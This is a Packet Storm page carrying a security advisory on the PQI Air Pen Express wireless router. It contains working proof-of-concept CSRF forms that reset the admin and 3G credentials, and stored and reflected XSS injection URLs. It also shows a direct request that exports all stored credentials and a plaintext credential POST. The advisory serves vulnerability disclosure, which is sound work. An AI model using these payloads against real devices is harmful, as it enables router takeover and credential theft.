what you don't know can hurt you

PQI Air Pen Express CSRF / XSS / Insecure Direct Object Reference

PQI Air Pen Express CSRF / XSS / Insecure Direct Object Reference
Posted Apr 5, 2016
Authored by OrwellLabs | Site orwelllabs.com

PQI Air Pen Express router versions 6W51-0000R2 and 6W51-0000R2XXX suffer from cross site request forgery, cross site scripting, and various other vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | 8c77724b9ebb3ec7d750cea85b810753

PQI Air Pen Express CSRF / XSS / Insecure Direct Object Reference

Change Mirror Download
                         _ _ _       _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/

Security Adivisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs

magicword: d0ubl3th1nk1ng...


Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Adivisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html


Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL


background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provide a excellent wireless expreience for
everyone.


I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits a page bellow, this will set the administrative credential
for PQI Air Pen express to "root:r00t"

<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


The attacker can also abuse of the multiple XSS in this device to exploit
this vulnerability, something like this to set the same cred 'root:r00t'

http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--


The following poc will set the credential to access point to "3groot:3g00t"
(and of course, any other value could be set in this way.)

<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticNetmask" value="255.255.255.0"
/>
<input type="hidden" name="staticGateway"
value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe_user" />

<input type="hidden" name="pppoePass" value="pppoe_passwd" />
<input type="hidden" name="pppoePass2" value="pppoe_passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp_server" />
<input type="hidden" name="l2tpUser" value="l2tp_user" />
<input type="hidden" name="l2tpPass" value="l2tp_passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192.168.1.1" />
<input type="hidden" name="l2tpNetmask" value="255.255.255.0"
/>
<input type="hidden" name="l2tpGateway" value="192.168.1.254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp_server" />
<input type="hidden" name="pptpUser" value="pptp_user" />
<input type="hidden" name="pptpPass" value="pptp_passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192.168.1.1" />
<input type="hidden" name="pptpNetmask" value="255.255.255.0"
/>
<input type="hidden" name="pptpGateway" value="192.168.1.254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> < -- 3G
User
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G
Password
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"

# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=


"Webs URL Filter Settings"

# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add

Request in this page will show a pop-up with a content of javascript
payload:
http://{airpenXweb}/firewall/content_filtering.asp

# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add


III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since it is not carried out any validation of the data provided by the
user.
Bellow are some examples:


"Basic Wireless Settings"

# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1

# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES

# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=

# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]

IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all credentials available via direct request to
/cgi-bin/ExportSettings.sh.

PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh

V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the Vendor's site) it is very clear that the
priority is to
facilitate everything for you, including setting. Therefore it is not
mandatory that a password
is configured for the web interface and not to connect to the AP, this way
you can find hundreds
of these completely unprotected APs.

VI. No SSL
``````````````````
Any action, whether sensitive or not is transmitted in plain text because
HTTPS is not used and no step.

POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

admuser=ORWL_user&admpass=ORWL_pass

Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered
and forms site contacts as well.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close